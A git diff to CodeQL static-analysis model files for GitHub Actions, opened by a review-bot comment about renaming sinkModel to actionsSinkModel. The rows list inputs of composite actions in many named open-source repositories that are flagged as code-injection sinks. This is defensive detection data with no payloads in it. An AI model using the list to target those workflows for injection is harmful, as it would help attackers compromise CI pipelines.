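Review bot: The renamed `extensible: actionsSinkModel` line (and its `actionsSourceModel`/`actionsSummaryModel` siblings) only keeps these rows live if the extensible predicate declared in the library's data-extension schema was renamed in the same change, and any `.model.yml` still addressed to `sinkModel`/`sourceModel`/`summaryModel` — including third-party packs that extend `githubsecuritylab/actions-all` — stops contributing sinks without a failing query, which for a security pack means silently lost detections. The files under `ql/lib/ext/generated/` further down this patch look generator-produced (inferred from the path and the `generated` provenance column); if that generator's template still emits the old names, the next regeneration reverts this rename. Worth updating the generator in the same change and adding a CI lint over `ql/lib/ext/**/*.model.yml` that fails on any `extensible:` value outside `actionsSourceModel|actionsSinkModel|actionsSummaryModel`, so a stale model file is caught rather than ignored.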
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4f..f04f8dda6c8e 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d98..a37d6452d504 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d657247359..352eb51996af 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a129..44f34c11cb3d 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc21876..3fd2e46296ab 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e57..881374b6c903 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad17..6d77c866dc25 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48a..0b27c5845844 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4a..911d3e571558 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a1..1ac668cf55ac 100644 
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fffe..5cf121dcef26 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17d..d946204e9b96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f5..c6839a7b004e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2e..9e708bbcc898 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c15609..cfb67540b174 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e2..7186433e6d27 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e68..d39aafe162ff 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a4..a3b53b3ec960 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf3..2a35d22a10e0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900c..156d244ece2d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e0..fcda4b3dfec0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761fe..84877f57d8c2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a9..dcb93d013a09 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fcd..4776bb79067e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a3..2540e6a76ca7 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b7259..525064de6a97 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a14..b46d5a3ee6a8 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e51583902..631457c813e4 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a05928..44d9eb10a0dc 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762dbf..0d7f80698f57 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220e..84caa0434846 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005edc..f6aed253a21d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd87..1eac49617f22 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220a..1efa6815c280 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f4..91463a305dd9 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7b..7ef240ad999c 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d31..db953acf5bc7 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf04..7c1b01e14b5a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef7..37b67a933a3a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad660960..570a9bdd142c 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175c..8c1993c47ca6 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe09..ee0adaadb3e2 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b5..c127f03bb66d 100644 
--- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee99..3b3d60fadd03 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d86..4dd43acd2c53 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d9..cb4bff25f9ac 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b66045..39a204389b99 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46a..6b4192c0c616 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7c..63c3fc89058b 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml 
